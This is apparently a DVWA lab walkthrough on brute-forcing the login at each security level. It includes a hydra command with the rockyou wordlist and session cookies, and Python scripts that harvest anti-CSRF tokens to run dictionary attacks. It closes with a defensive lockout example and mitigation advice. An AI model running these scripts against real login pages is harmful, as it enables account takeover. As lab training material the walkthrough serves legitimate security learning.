In this walkthrough we go through the Bruteforce vulnerability section of the DVWA labs. We will explore bruteforce attacks and learn what makes an application vulnerable to them. We start with the security level set to Low and gradually raise the difficulty as we progress. So, let's get started with the hacking without any delay.
Bruteforce Attacks:
A bruteforce attack is one where the attacker tries password guesses one after another in order to gain access to an authenticated system. In practice it is usually a dictionary attack: a wordlist of likely passwords (dictionary words, leaked passwords, common patterns) is tried against one or more candidate usernames in the hope that one pair is accepted. Given unlimited attempts a bruteforce attack will eventually succeed; whether it succeeds in practice depends on factors like password length, password complexity, the speed at which the application answers and whether it locks the account or rate-limits the client after repeated failures.
Security: Low (Bruteforce)
- Starting with the security level set to Low. We have a login panel that expects a username and password combination in order to get in.
- I tried common credentials like admin:123.
- Next, tried admin:password and got in. Quite easy.
Security: Medium (Bruteforce)
- For the medium level, I captured the request via Burp Suite. We can see two parameters, username and password, in the GET request.
- Next, I used hydra to bruteforce the login with rockyou.txt. Remember to pass the cookies of your already authenticated DVWA session (the PHPSESSID and security=medium cookies); without them hydra is redirected to the DVWA login page and every guess looks like a failure. The medium level also sleeps for two seconds after each wrong guess, so expect low throughput and keep the number of parallel tasks (-t) modest.
sudo hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt localhost http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:PHPSESSID=2v14onb9bcasu8cc7ge73n9en7; security=medium:F=Username and/or password incorrect"
Security: High (Bruteforce)
- I set the security to High and enabled PHPIDS for this one.
- Captured the request via Burp Suite. This time the application sends an Anti-CSRF token (user_token) along with the request.
- The token changes on every request. Tried the common bypasses: changing the token value, sending it blank, removing the user_token parameter altogether, and switching the request method from GET to POST. None of them worked.
- Looked into the source code. The application generates a fresh Anti-CSRF token on every page load; the token is mandatory and must be submitted together with the session cookie. When it was missing or wrong I got a 302 redirect for both the correct and the incorrect password, so the response no longer tells us anything about the credentials.
- I noticed a user_token field in the page source. Refreshing the page confirmed that a new Anti-CSRF token is generated here on each load.
- To extract the Anti-CSRF token, I wrote a small proof of concept in Python that grabs the unique token from the page.
from urllib.request import urlopen
from bs4 import BeautifulSoup

# Fetch the page. Without a logged-in session DVWA redirects to login.php,
# which also embeds a hidden user_token field, so this still returns a token.
html = urlopen('http://localhost')
bsObj = BeautifulSoup(html, features="html.parser")

# Find the hidden Anti-CSRF input and print its value
input_tag = bsObj.find(attrs={"name": "user_token"})
usertoken = input_tag['value']
print(usertoken)
python3 main.py
- Next, I folded this into a bruteforce script that reads the token from each response and brute-forces the login with it.
from sys import argv
import requests
from bs4 import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename = argv

# set up our target, cookie and session
url = 'http://127.0.0.1/vulnerabilities/brute/'
success_message = "Welcome to the password protected area admin"
cookie = {'security': 'high', 'PHPSESSID': 'o8a7cb27uaonjb5b9oe5csnv30'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)


def checkSuccess(html):
    '''
    @param: html (String)
    Searches the response HTML for our specified success message
    '''
    # get our soup ready for searching
    soup = Soup(html, features="html.parser")
    # check for our success message in the soup
    search = soup.findAll(string=success_message)
    if not search:
        success = False
    else:
        success = True
    # return the brute force result
    return success


# Get the initial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source, features="html.parser")
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

# Display before attack
print('DVWA URL: ' + url)
print('CSRF Token: ' + csrf_token)

# Loop through our provided password file. rockyou.txt contains non-UTF-8
# lines, so decode as latin-1 instead of letting the default codec crash.
success = False
with open(filename, encoding='latin-1') as f:
    print('Running brute force attack...')
    for password in f:
        # strip the trailing newline before displaying and sending the guess
        password = password.strip()
        print('[*] Checking password: ' + password)
        # setup the payload
        payload = {'username': 'admin', 'password': password,
                   'Login': 'Login', 'user_token': csrf_token}
        r = s.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)
        if not success:
            # if it failed the CSRF token will have changed. Get the new one
            soup = Soup(r.text, features="html.parser")
            csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
        else:
            # Success! Show the result
            print("[+] Found Password: " + password)
            break

# We failed, bummer.
if not success:
    print("[-] Brute force failed. No matches found.")
python3 bruteforce.py ~/Desktop/Wordlist/rockyou.txt
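The script above assumes that every response carries a fresh user_token; if the server rejects the token (the 302 redirect noted earlier), the indexing in findAll(...)[0] raises an IndexError and the run dies. The following is an added example, not code from the original post or from DVWA, showing how a dictionary attack of the same shape can recognise the three possible outcomes (success, wrong password, token rejected) and recover by re-fetching the form. It uses only the standard library. FakeDVWA is a constructed stand-in for the high-level endpoint, written here so the example runs offline; its rotate_every option deliberately invalidates the token every N attempts to exercise the recovery path. The marker strings are the ones the page's script already keys on.

```python
import re
import secrets

# Markers the page's script keys on (DVWA's own response strings).
SUCCESS_MARKER = "Welcome to the password protected area"
FAILURE_MARKER = "Username and/or password incorrect"


def extract_token(html):
    """Return the value of the hidden user_token input, or None if the page has none."""
    tag = re.search(r"<input[^>]*name=['\"]user_token['\"][^>]*>", html)
    if not tag:
        return None
    value = re.search(r"value=['\"]([^'\"]*)['\"]", tag.group(0))
    return value.group(1) if value else None


def classify(status_code, html):
    """Map one login response to an outcome the brute-forcer can act on."""
    if status_code in (301, 302, 303, 307, 308):
        return "token_rejected"   # DVWA bounces to index.php when the token is missing or stale
    if SUCCESS_MARKER in html:
        return "success"
    if FAILURE_MARKER in html:
        return "failure"
    return "unknown"


class FakeDVWA:
    """Constructed stand-in for the high-level endpoint (not DVWA's code): every
    response carries a fresh token, a request must present the latest one or it
    is redirected, and rotate_every>0 silently rotates the token every N attempts
    to simulate the token going stale under the attacker's feet."""

    def __init__(self, password, rotate_every=0):
        self._password = password
        self._rotate_every = rotate_every
        self._attempts = 0
        self._token = secrets.token_hex(16)

    def _page(self, body):
        self._token = secrets.token_hex(16)   # what generateSessionToken() does per page load
        return 200, (f"<p>{body}</p>"
                     f"<input type='hidden' name='user_token' value='{self._token}' />")

    def get(self, params=None):
        if not params:
            return self._page("")
        self._attempts += 1
        if self._rotate_every and self._attempts % self._rotate_every == 0:
            self._token = secrets.token_hex(16)
        if params.get("user_token") != self._token:
            return 302, ""
        if params.get("password") == self._password:
            return self._page(f"{SUCCESS_MARKER} {params.get('username', '')}")
        return self._page(f"{FAILURE_MARKER}.")


def brute_force(site, username, passwords):
    """Dictionary attack that re-reads the token from each response and
    re-fetches the form when the server rejects the token, instead of crashing.
    Returns (password or None, number of login attempts sent)."""
    attempts = 0
    token = extract_token(site.get()[1])
    for pw in (p.strip() for p in passwords if p.strip()):
        outcome = "unknown"
        for _ in range(2):   # at most one retry per password, after a token refresh
            status, html = site.get({"username": username, "password": pw,
                                     "Login": "Login", "user_token": token})
            attempts += 1
            outcome = classify(status, html)
            if outcome == "token_rejected":
                token = extract_token(site.get()[1])
                continue
            token = extract_token(html) or token   # failure pages carry the next token
            break
        if outcome == "success":
            return pw, attempts
    return None, attempts


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    wordlist = ["123\n", "letmein\n", "\n", "password\n", "qwerty\n"]
    print(brute_force(FakeDVWA("password", rotate_every=2), "admin", wordlist))
```

Against a real target, site.get would be a requests.Session call with allow_redirects=False, so that the 302 is seen as a status code rather than silently followed to index.php.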
Security: Impossible (Bruteforce)
- Set the security level to Impossible with PHPIDS enabled.
- Captured the request via Burp Suite.
- There is a lockout on this one and I have not found a way around it yet. There is no parameter in the request that can be manipulated: after three failed attempts (the limit in DVWA's impossible level) the account is locked for 15 minutes, and the lock is tied to the account rather than to the client, so changing sessions or source addresses does not help. We cannot realistically bruteforce this.
Conclusion:
So, we finally completed all the security levels of the DVWA Bruteforce vulnerability. We looked at how the application is set up at each level and how the security controls at the lower levels can be bypassed. On the defensive side, bruteforce attacks are mitigated by enforcing a strong password policy, adding delays or rate limits on failed logins, and implementing a lockout mechanism like the one at the Impossible level; keep in mind that a per-account lockout also lets an attacker lock the legitimate user out on purpose, so it should be combined with rate limiting and ideally multi-factor authentication. On that note, I will take your leave and meet you in the next one with another DVWA vulnerability writeup, till then "Keep Hacking".
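To make concrete why nothing in the Impossible-level request could be manipulated, and what the lockout recommended above looks like server-side, here is an added example (not DVWA's PHP and not code from the original post) of a login service with a per-account lockout modelled on that level: three failed attempts lock the account for 15 minutes, a counter and timestamp are kept per account, and the correct password is refused while the lock is active. It uses only the standard library. The Account and LoginService names, the salted PBKDF2 hashing (DVWA itself stores unsalted md5) and the injectable clock are this example's own choices.

```python
import hashlib
import hmac
import os
import time
from dataclasses import dataclass

MAX_FAILED = 3               # failed attempts before lockout (DVWA's impossible level uses 3)
LOCKOUT_SECONDS = 15 * 60    # the 15-minute lockout observed on the page


def hash_password(password, salt):
    """Slow, salted hash. DVWA stores unsalted md5, which is what makes an
    offline attack on a leaked table cheap; a real service should use this
    or bcrypt/argon2 instead."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class Account:
    salt: bytes
    password_hash: bytes
    failed_logins: int = 0
    last_failed: float = 0.0


class LoginService:
    """Per-account lockout: after MAX_FAILED consecutive failures the account
    refuses even the correct password until LOCKOUT_SECONDS have passed since
    the last failure. The clock is injectable so the behaviour can be exercised
    without waiting 15 minutes."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._accounts = {}

    def register(self, username, password):
        salt = os.urandom(16)
        self._accounts[username] = Account(salt, hash_password(password, salt))

    def is_locked(self, username):
        acct = self._accounts.get(username)
        if acct is None:
            return False
        return (acct.failed_logins >= MAX_FAILED
                and self._clock() - acct.last_failed < LOCKOUT_SECONDS)

    def login(self, username, password):
        """Return 'success', 'failure' or 'locked'. Unknown users get the same
        'failure' as a wrong password so the response does not leak usernames."""
        acct = self._accounts.get(username)
        if acct is None:
            return "failure"
        if self.is_locked(username):
            return "locked"
        if hmac.compare_digest(hash_password(password, acct.salt), acct.password_hash):
            acct.failed_logins = 0       # a good login clears the counter
            return "success"
        acct.failed_logins += 1
        acct.last_failed = self._clock()
        return "failure"


if __name__ == "__main__":
    svc = LoginService()
    svc.register("admin", "password")
    # Constructed guesses: the fourth one is correct but arrives after the lock engaged.
    for guess in ["123", "letmein", "qwerty", "password"]:
        print(guess, "->", svc.login("admin", guess))
```

Two points a practitioner should take from it: the counter lives with the account (DVWA keeps it in the users table), so it must persist across requests and restarts rather than sit in memory; and because the lock is keyed on the username, anyone who knows a valid username can trigger it three guesses at a time, which is the denial-of-service trade-off that makes rate limiting and MFA the better first line of defence.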